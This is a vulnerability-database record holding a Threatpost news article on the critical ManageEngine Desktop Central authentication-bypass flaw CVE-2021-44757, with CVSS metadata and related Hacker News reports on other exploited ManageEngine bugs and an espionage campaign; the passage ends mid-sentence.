Critical ManageEngine Desktop Server Bug Opens Orgs to Malware

2022-01-18T15:44:21

Description

A critical security vulnerability in the Zoho ManageEngine Desktop Central and Desktop Central MSP platforms could allow authentication bypass, the company has warned. The bug (CVE-2021-44757) could allow a remote user to “perform unauthorized actions in the server,” according to the company’s Monday [security advisory](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>). “If exploited, this vulnerability may allow an attacker to read unauthorized data or write an arbitrary .ZIP file on the server.” Zoho’s ManageEngine Desktop Central is a unified endpoint management (UEM) solution that lets IT admins manage servers, laptops, desktops, smartphones and tablets from a central location. Users can automate routines like installing patches, deploying software, imaging and deploying OS, according to the company’s [documentation.](<https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html>) It can also be used to manage assets and software licenses, monitor software-usage statistics, manage USB device usage, take control of remote desktops, and more. On the mobile side, users can deploy profiles and policies; configure devices for Wi-Fi, VPNs, email accounts and so on; apply restrictions on application installs, camera usage and the browser; and manage security with passcodes and remote lock/wipe functionality. As such, the platform offers far-reaching access into the guts of an organization’s IT footprint, making for an information-disclosure nightmare in the case of an exploit, potentially. As well, the [ability to install a .ZIP file](<https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html>) paves the way for the installation of malware on all of the endpoints managed by the Desktop Central instance. In the case of the MSP version – which, as its name suggests, allows managed service providers (MSPs) to offer endpoint management to their own customers – the bug could be used in a [supply-chain attack](<https://threatpost.com/kaseya-attack-fallout/167541/>). Cybercriminals can simply compromise one MSP’s Desktop Central MSP edition and potentially gain access to the customers whose footprints are being managed using it, depending on security measures the provider has put in place. Zoho ManageEngine [released a Knowledge Base entry detailing patches](<https://www.manageengine.com/products/desktop-central/cve-2021-44757.html>) on Monday, and users are encouraged to update to the latest build in order to protect themselves. The firm also offered tips for general hardening of Desktop Central environments in the KB article. ## **Zoho ManageEngine: Popular for Zero-Day Attacks** The company didn’t say whether the bug has been under attack as a zero-day vulnerability, but it’s a good bet that cyberattackers will start targeting it for exploit if they haven’t already. The ManageEngine platform is a popular one for attackers, given its all-seeing nature. This played out in September, for instance, when a critical security vulnerability (CVE-2021-40539) in the Zoho ManageEngine ADSelfService Plus platform was patched; it could allow remote attackers to bypass authentication and have free rein across users’ Active Directory (AD) and cloud accounts. But it was [under active attack](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) even before it was fixed, according to the Cybersecurity and Infrastructure Security Agency (CISA). In December, the FBI even went so far as to issue [an official alert](<https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/>) after a Zoho ManageEngine zero-day vulnerability was found to be under active attack from an advanced persistent threat (APT) group. That bug (CVE-2021-44515) could allow remote attackers to override legitimate functions of servers running ManageEngine Desktop Central and to elevate privileges – with an ultimate goal of dropping malware onto organizations’ networks. **_Password_**_ _**_Reset: _****_[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):_**_ Fortify 2022 with a password-security strategy built for today’s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. _**_[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)_**_ – sponsored by Specops Software._

{"id": "THREATPOST:98AF08B524D08ABCEB115FECEE99B70F", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Critical ManageEngine Desktop Server Bug Opens Orgs to Malware", "description": "A critical security vulnerability in the Zoho ManageEngine Desktop Central and Desktop Central MSP platforms could allow authentication bypass, the company has warned.\n\nThe bug (CVE-2021-44757) could allow a remote user to \u201cperform unauthorized actions in the server,\u201d according to the company\u2019s Monday [security advisory](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>). \u201cIf exploited, this vulnerability may allow an attacker to read unauthorized data or write an arbitrary .ZIP file on the server.\u201d\n\nZoho\u2019s ManageEngine Desktop Central is a unified endpoint management (UEM) solution that lets IT admins manage servers, laptops, desktops, smartphones and tablets from a central location. Users can automate routines like installing patches, deploying software, imaging and deploying OS, according to the company\u2019s [documentation.](<https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html>) It can also be used to manage assets and software licenses, monitor software-usage statistics, manage USB device usage, take control of remote desktops, and more.\n\nOn the mobile side, users can deploy profiles and policies; configure devices for Wi-Fi, VPNs, email accounts and so on; apply restrictions on application installs, camera usage and the browser; and manage security with passcodes and remote lock/wipe functionality.\n\nAs such, the platform offers far-reaching access into the guts of an organization\u2019s IT footprint, making for an information-disclosure nightmare in the case of an exploit, potentially. As well, the [ability to install a .ZIP file](<https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html>) paves the way for the installation of malware on all of the endpoints managed by the Desktop Central instance.\n\nIn the case of the MSP version \u2013 which, as its name suggests, allows managed service providers (MSPs) to offer endpoint management to their own customers \u2013 the bug could be used in a [supply-chain attack](<https://threatpost.com/kaseya-attack-fallout/167541/>). Cybercriminals can simply compromise one MSP\u2019s Desktop Central MSP edition and potentially gain access to the customers whose footprints are being managed using it, depending on security measures the provider has put in place.\n\nZoho ManageEngine [released a Knowledge Base entry detailing patches](<https://www.manageengine.com/products/desktop-central/cve-2021-44757.html>) on Monday, and users are encouraged to update to the latest build in order to protect themselves. The firm also offered tips for general hardening of Desktop Central environments in the KB article.\n\n## **Zoho ManageEngine: Popular for Zero-Day Attacks**\n\nThe company didn\u2019t say whether the bug has been under attack as a zero-day vulnerability, but it\u2019s a good bet that cyberattackers will start targeting it for exploit if they haven\u2019t already. The ManageEngine platform is a popular one for attackers, given its all-seeing nature.\n\nThis played out in September, for instance, when a critical security vulnerability (CVE-2021-40539) in the Zoho ManageEngine ADSelfService Plus platform was patched; it could allow remote attackers to bypass authentication and have free rein across users\u2019 Active Directory (AD) and cloud accounts. But it was [under active attack](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) even before it was fixed, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nIn December, the FBI even went so far as to issue [an official alert](<https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/>) after a Zoho ManageEngine zero-day vulnerability was found to be under active attack from an advanced persistent threat (APT) group. That bug (CVE-2021-44515) could allow remote attackers to override legitimate functions of servers running ManageEngine Desktop Central and to elevate privileges \u2013 with an ultimate goal of dropping malware onto organizations\u2019 networks.\n\n**_Password_**_ _**_Reset: _****_[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):_**_ Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. _**_[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)_**_ \u2013 sponsored by Specops Software._\n", "published": "2022-01-18T15:44:21", "modified": "2022-01-18T15:44:21", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://threatpost.com/critical-manageengine-desktop-server-bug-malware/177705/", "reporter": "Tara Seals", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022", "https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html", "https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html", "https://threatpost.com/kaseya-attack-fallout/167541/", "https://www.manageengine.com/products/desktop-central/cve-2021-44757.html", "https://threatpost.com/zoho-password-manager-zero-day-attack/169303/", "https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/", "https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/", "https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/", "https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/"], "cvelist": ["CVE-2021-40539", "CVE-2021-44515", "CVE-2021-44757"], "immutableFields": [], "lastseen": "2022-01-18T16:16:07", "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12", "AKB:DEB21742-F92B-4F5A-931C-082502383C34"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0879", "CPAI-2021-1110"]}, {"type": "cisa", "idList": ["CISA:01AC83B2C29761024423083A8BE9CE80", "CISA:28BCD901AF6661FE02928495E4D03129", "CISA:2D62C340878780A9844A8FFDFA548783", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:5AF9A0A9C471BAA02A04E99AE31ED456", "CISA:906D00DDCD25874F8A28FE348820F80A", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cve", "idList": ["CVE-2021-40539", "CVE-2021-44515", "CVE-2021-44757"]}, {"type": "githubexploit", "idList": ["A32F9E91-783B-5C20-9630-6A4E3DDA9AFF"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280", "HIVEPRO:EBE89D6C841CF2A41508860258C415CD"]}, {"type": "krebs", "idList": ["KREBS:69ADDAD13D83673CDE629B3AD655DD29"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "MALWAREBYTES:B8C767042833344389F6158273089954"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539-"]}, {"type": "mmpc", "idList": ["MMPC:B1806E4D7F97F83DB41A41A9BBF86D13"]}, {"type": "mssecure", "idList": ["MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13"]}, {"type": "nessus", "idList": ["MANAGEENGINE_ADSELFSERVICE_6114.NASL", "MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN", "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_9.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2021-44757.NBIN", "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2021-40539.NBIN", "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165085"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:D84509B01151F59E9152A401D5CF206D", "RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124"]}, {"type": "srcincite", "idList": ["SRC-2022-0001"]}, {"type": "thn", "idList": ["THN:1678C3AE3BCB0278860461A943C3DF30", "THN:60B42277F576BB78A640A9D3B976D8D8", "THN:A29E47C7A7467A109B420FF0819814EE", "THN:D0F9B64B55AE6B07B3B0C0540189389E", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938", "THN:E7E8D45492BAD83E88C89D34F8502485"]}, {"type": "threatpost", "idList": ["THREATPOST:0461DD3D883C3FB99943B312BF96E57D", "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "THREATPOST:2819C02936EF8F6F36ACF4F04F4B71DB", "THREATPOST:31B21CE688CDF18D92BF7799CEAFD33F", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "THREATPOST:BC99709891AA93FC7767B53445FC2736"]}, {"type": "zdt", "idList": ["1337DAY-ID-37080"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:DEB21742-F92B-4F5A-931C-082502383C34"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0879"]}, {"type": "cisa", "idList": ["CISA:01AC83B2C29761024423083A8BE9CE80", "CISA:28BCD901AF6661FE02928495E4D03129", "CISA:2D62C340878780A9844A8FFDFA548783", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C"]}, {"type": "cve", "idList": ["CVE-2021-40539"]}, {"type": "githubexploit", "idList": ["A32F9E91-783B-5C20-9630-6A4E3DDA9AFF"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}, {"type": "krebs", "idList": ["KREBS:69ADDAD13D83673CDE629B3AD655DD29"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539/"]}, {"type": "mmpc", "idList": ["MMPC:B1806E4D7F97F83DB41A41A9BBF86D13"]}, {"type": "mssecure", "idList": ["MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13"]}, {"type": "nessus", "idList": ["MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN", "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2021-40539.NBIN", "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165085"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:D84509B01151F59E9152A401D5CF206D", "RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124"]}, {"type": "srcincite", "idList": ["SRC-2022-0001"]}, {"type": "thn", "idList": ["THN:1678C3AE3BCB0278860461A943C3DF30", "THN:60B42277F576BB78A640A9D3B976D8D8", "THN:D0F9B64B55AE6B07B3B0C0540189389E", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:BC99709891AA93FC7767B53445FC2736"]}, {"type": "zdt", "idList": ["1337DAY-ID-37080"]}]}, "exploitation": null, "vulnersScore": 0.1}, "_state": {"dependencies": 1659988328, "score": 1659972467}, "_internal": {"score_hash": "f4788b44d0750a56cb02acb21f1a9308"}}

{"thn": [{"lastseen": "2022-05-09T12:37:42", "description": "[![ManageEngine Desktop Central Software](https://thehackernews.com/new-images/img/a/AVvXsEi_JzJRZbhmwlI8nV6xvkiS-sqhx4pz9DQL18ARUkEMQ_wOFlAYdEOdD4hlQoSB4-kzuDeFRvQMomyrIIJrBdy18WyEjmjhgJP6BXAkfU9f0Rq6tEf8fPpFqfB2ECAX-eKxA8bnmcz82Btn6m88Da1ZmVoPX2PGZ-VwDYc04o6OHV0-wKonRvpMc6UK=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEi_JzJRZbhmwlI8nV6xvkiS-sqhx4pz9DQL18ARUkEMQ_wOFlAYdEOdD4hlQoSB4-kzuDeFRvQMomyrIIJrBdy18WyEjmjhgJP6BXAkfU9f0Rq6tEf8fPpFqfB2ECAX-eKxA8bnmcz82Btn6m88Da1ZmVoPX2PGZ-VwDYc04o6OHV0-wKonRvpMc6UK>)\n\nEnterprise software maker Zoho on Monday issued patches for a critical security vulnerability in Desktop Central and Desktop Central MSP that a remote adversary could exploit to perform unauthorized actions in affected servers.\n\nTracked as [CVE-2021-44757](<https://nvd.nist.gov/vuln/detail/CVE-2021-44757>), the shortcoming concerns an instance of authentication bypass that \"may allow an attacker to read unauthorized data or write an arbitrary zip file on the server,\" the company [noted](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>) in an advisory.\n\nOsword from SGLAB of Legendsec at Qi'anxin Group has been credited with discovering and reporting the vulnerability. The Indian firm said it remediated the issue in build version 10.1.2137.9.\n\nWith the latest fix, Zoho has addressed a total of four vulnerabilities over the past five months \u2014\n\n * [CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) (CVSS score: 9.8) \u2013 Authentication bypass vulnerability affecting Zoho ManageEngine ADSelfService Plus\n * [CVE-2021-44077](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) (CVSS score: 9.8) \u2013 Unauthenticated remote code execution vulnerability affecting Zoho ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP, and SupportCenter Plus, and\n * [CVE-2021-44515](<https://thehackernews.com/2021/12/warning-yet-another-zoho-manageengine.html>) (CVSS score: 9.8) \u2013 Authentication bypass vulnerability affecting Zoho ManageEngine Desktop Central\n\nIn light of the fact that all the three aforementioned flaws have been exploited by malicious actors, it's recommended that users apply the updates as soon as possible to mitigate any potential threats.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T05:13:00", "type": "thn", "title": "Zoho Releases Patch for Critical Flaw Affecting ManageEngine Desktop Central", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515", "CVE-2021-44757"], "modified": "2022-01-18T10:03:19", "id": "THN:A29E47C7A7467A109B420FF0819814EE", "href": "https://thehackernews.com/2022/01/zoho-releases-patch-for-critical-flaw.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:51", "description": "[![Zoho ManageEngine](https://thehackernews.com/new-images/img/a/AVvXsEjHMcXDV_clY9qcSsKkb2OAnYKFj0UHRQhJw2hVPqXcoFYUHdOV9I1c1_n8Cts-WBNsCC5QeLRhSXMP8AXBcSxfSv7-X1u92p_NKlGh0e1T367go5qLlZP_JyRzjUIMcONyTPXffBuAVxGFdEi87vmow8jsvdsVu1kywwfDfJESNMvFBaxHuAlYmc0Q=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEjHMcXDV_clY9qcSsKkb2OAnYKFj0UHRQhJw2hVPqXcoFYUHdOV9I1c1_n8Cts-WBNsCC5QeLRhSXMP8AXBcSxfSv7-X1u92p_NKlGh0e1T367go5qLlZP_JyRzjUIMcONyTPXffBuAVxGFdEi87vmow8jsvdsVu1kywwfDfJESNMvFBaxHuAlYmc0Q>)\n\nEnterprise software provider Zoho on Friday warned that a newly patched critical flaw in its Desktop Central and Desktop Central MSP is being actively exploited by malicious actors, marking the third security vulnerability in its products to be abused in the wild in a span of four months.\n\nThe issue, assigned the identifier [CVE-2021-44515](<https://nvd.nist.gov/vuln/detail/CVE-2021-44515>), is an authentication bypass vulnerability that could permit an adversary to circumvent authentication protections and execute arbitrary code in the Desktop Central MSP server.\n\n\"If exploited, the attackers can gain unauthorized access to the product by sending a specially crafted request leading to remote code execution,\" Zoho [cautioned](<https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp>) in an [advisory](<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>). \"As we are noticing indications of exploitation of this vulnerability, we strongly advise customers to update their installations to the latest build as soon as possible.\"\n\n[![Zoho ManageEngine](https://thehackernews.com/new-images/img/a/AVvXsEj1xx5yUi1N8hhGwCsKIe41nVNxRANWaKDVgeuBCUxVqEN45mzkSaOzVblxzHvLtCK-S72xInMv4NWD4QK3W_SCbiMYIvb1aWhb4RUPVekHI3U6EYX9pyFk2YzPaff25pZUh78cc-rh7QoowlHfpWg_XvNGJTVk5a-4xiCyFSQB1ERi9_IrQwoKwI9U=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEj1xx5yUi1N8hhGwCsKIe41nVNxRANWaKDVgeuBCUxVqEN45mzkSaOzVblxzHvLtCK-S72xInMv4NWD4QK3W_SCbiMYIvb1aWhb4RUPVekHI3U6EYX9pyFk2YzPaff25pZUh78cc-rh7QoowlHfpWg_XvNGJTVk5a-4xiCyFSQB1ERi9_IrQwoKwI9U>)\n\nThe company has also made available an [Exploit Detection Tool](<https://downloads.zohocorp.com/dnd/Desktop_Central/XTsIm8tSrnzjXhW/detector.zip>) that will help customers identify signs of compromise in their installations.\n\nWith this development, CVE-2021-44515 joins two other vulnerabilities [CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) and [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) that have been [weaponized](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) to compromise the networks of critical infrastructure organizations across the world.\n\nThe disclosure also comes a day after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) that CVE-2021-44077 \u2014 an unauthenticated, remote code execution vulnerability affecting ServiceDesk Plus \u2014 is being exploited to drop web shells and carry out an array of post-exploitation activities as part of a campaign dubbed \"TiltedTemple.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-04T05:07:00", "type": "thn", "title": "Warning: Yet Another Zoho ManageEngine Product Found Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515"], "modified": "2021-12-04T05:09:04", "id": "THN:DB8E18C57AFB9EEEFDABD840FBF5D938", "href": "https://thehackernews.com/2021/12/warning-yet-another-zoho-manageengine.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:07", "description": "[![ManageEngine ADSelfService Exploit](https://thehackernews.com/new-images/img/a/AVvXsEgGACK0sbY62-eZqfAxY507UACUU6L-2jv6DylVUuLJIlKvZ70mFTDCqexN_Ra9wCH0vczNR_SyX8JDu9w9hoQxe9JbFzT0l1V7Qa5nT7ZJu8hDShes_BHVy5lqMKr5lp4Z8Nnxrz-vXgqUp4O2XOrauZ5X_iVYbimAWmw_5f-dDDkeDGPvLqUzcWSH=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgGACK0sbY62-eZqfAxY507UACUU6L-2jv6DylVUuLJIlKvZ70mFTDCqexN_Ra9wCH0vczNR_SyX8JDu9w9hoQxe9JbFzT0l1V7Qa5nT7ZJu8hDShes_BHVy5lqMKr5lp4Z8Nnxrz-vXgqUp4O2XOrauZ5X_iVYbimAWmw_5f-dDDkeDGPvLqUzcWSH>)\n\nAt least nine entities across the technology, defense, healthcare, energy, and education industries were compromised by leveraging a [recently patched critical vulnerability](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) in Zoho's ManageEngine ADSelfService Plus self-service password management and single sign-on (SSO) solution.\n\nThe spying campaign, which was observed starting September 22, 2021, involved the threat actor taking advantage of the flaw to gain initial access to targeted organizations, before moving laterally through the network to carry out post-exploitation activities by deploying malicious tools designed to harvest credentials and exfiltrate sensitive information via a backdoor.\n\n\"The actor heavily relies on the Godzilla web shell, uploading several variations of the open-source web shell to the compromised server over the course of the operation,\" researchers from Palo Alto Networks' Unit 42 threat intelligence team [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) in a report. \"Several other tools have novel characteristics or have not been publicly discussed as being used in previous attacks, specifically the NGLite backdoor and the KdcSponge stealer.\"\n\nTracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>), the vulnerability relates to an authentication bypass vulnerability affecting [REST API](<https://en.wikipedia.org/wiki/Representational_state_transfer>) URLs that could enable remote code execution, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to warn of active exploitation attempts in the wild. The security shortcoming has been rated 9.8 out of 10 in severity.\n\nReal-world attacks weaponizing the bug are said to have commenced as early as August 2021, according to CISA, the U.S. Federal Bureau of Investigation (FBI), and the Coast Guard Cyber Command (CGCYBER).\n\nUnit 42's investigation into the attack campaign found that successful initial exploitation activities were consistently followed by the installation of a Chinese-language JSP web shell named \"[Godzilla](<https://github.com/BeichenDream/Godzilla/>),\" with select victims also infected with a custom Golang-based open-source Trojan called \"[NGLite](<https://github.com/Maka8ka/NGLite>).\"\n\n\"NGLite is characterized by its author as an 'anonymous cross-platform remote control program based on blockchain technology,'\" researchers Robert Falcone, Jeff White, and Peter Renals explained. \"It leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\"\n\nIn subsequent steps, the toolset enabled the attacker to run commands and move laterally to other systems on the network, while simultaneously transmitting files of interest. Also deployed in the kill chain is a novel password-stealer dubbed \"KdcSponge\" orchestrated to steal credentials from domain controllers.\n\nUltimately, the adversary is believed to have targeted at least 370 Zoho ManageEngine servers in the U.S. alone beginning September 17. While the identity of the threat actor remains unclear, Unit 42 said it observed [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and that of [Emissary Panda](<https://thehackernews.com/2021/08/experts-believe-chinese-hackers-are.html>) (aka APT27, TG-3390, BRONZE UNION, Iron Tiger, or LuckyMouse).\n\nMicrosoft, which is also independently tracking the same campaign, tied it to an emerging threat cluster \"[DEV-0322](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>)\" that's operating out of China and has been previously detected exploiting a zero-day flaw in SolarWinds Serv-U managed file transfer service in July 2021. The Redmond-based company also pointed out the deployment of an implant called 